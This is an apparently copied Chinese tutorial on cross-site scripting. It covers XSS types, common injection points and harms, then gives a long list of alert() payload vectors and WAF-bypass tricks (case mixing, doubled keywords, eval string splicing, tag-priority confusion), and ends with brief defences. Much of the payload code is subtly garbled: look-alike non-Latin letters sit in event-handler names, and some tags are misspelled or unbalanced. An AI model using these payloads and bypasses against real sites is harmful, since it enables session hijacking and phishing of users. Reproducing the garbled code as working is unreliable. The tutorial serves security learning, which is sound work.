XSS跨站脚本漏洞

XSS漏洞的原理

原理 :指攻击者利用网站程序对用户输入过滤不足，输入可以显示在页面上对其他用户造成影响 的 HTML 代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本，若服务器对用户的输入不进行 处理或处理不严，则浏览器就会直接执行用户注入的脚本。

XSS漏洞的分类

1.反射型（非持久型）

     反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中。
    反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

2.存储型（持久型）

   持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。
此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

 3.DOM 型

      传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。

XSS漏洞容易出现的地方

XSS跨站脚本漏洞容易出现的地方有以下几个地方：-数据交互的地方
get、post、headers
反馈与浏览
富文本编辑器
各类标签插入和自定义
-数据输出的地方
用户资料
关键词、标签、说明
文件上传

XSS漏洞的危害

   网络钓鱼，包括获取各类用户账号； 窃取用户 cookies 资料，从而获取用户隐私信息，或利用用户身份对网站执行操作； 劫持用户（浏览器）会话，从而执行任意操作，例如非法转账、发表日志、邮件等； 强制弹出广告页面、刷流量等； 网页挂马；

XSS攻防

XSS构造

1.没用过滤的情况下，XSS的构造有以下几种方式:

<scirpt>
<scirpt>alert("xss");</script>
<img>
<img src=1 οnerrοr=alert("xss");>
<input>
<input οnfοcus="alert('xss');">
竞争焦点，从而触发onblur事件
<input οnblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<input οnfοcus="alert('xss');" autofocus>
<details>
<details οntοggle="alert('xss');">
使用open属性触发ontoggle事件，无需用户去触发
<details open οntοggle="alert('xss');">
<svg>
<svg οnlοad=alert("xss");>
<select>
<select οnfοcus=alert(1)></select>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<select οnfοcus=alert(1) autofocus>
<iframe>
<iframe οnlοad=alert("xss");></iframe>
<video>
<video><source οnerrοr="alert(1)">
<audio>
<audio src=x  οnerrοr=alert("xss");>
<body>
<body/οnlοad=alert("xss");>
利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

<body
οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea>
<textarea οnfοcus=alert("xss"); autofocus>
<keygen>
<keygen autofocus οnfοcus=alert(1)> //仅限火狐
<marquee>
<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以
<isindex>
<isindex type=image src=1 οnerrοr=alert("xss")>//仅限于IE
利用link远程包含js文件
PS：在无CSP的情况下才可以

<link rel=import href="http://127.0.0.1/1.js">
javascript伪协议
<a>标签

<a href="javascript:alert(`xss`);">xss</a>
<iframe>标签

<iframe src=javascript:alert('xss');></iframe>
<img>标签

<img src=javascript:alert('xss')>//IE7以下
<form>标签

<form action="Javascript:alert(1)"><input type=submit>
其它
expression属性

<img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下
background属性

<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

2.常见的绕过方式有以下几种

过滤空格
用/代替空格

<img/src="x"/οnerrοr=alert("xss");>
过滤关键字
大小写绕过
<ImG sRc=x onerRor=alert("xss");>
双写关键字
有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过

<imimgg srsrcc=x οnerrοr=alert("xss");>
字符拼接
利用eval

<img src="x" οnerrοr="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">
利用top

<script>top["al"+"ert"](`xss`);</script>
其它字符混淆
有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子

可利用注释、标签的优先级等
1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x οnerrοr="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效
3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

xss的防御

1.过滤一些危险字符，以及转义& < > " ' /等危险字符
2.HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie。
3.设置CSP(Content Security Policy)
4.输入内容长度限制

小白总结，大佬勿喷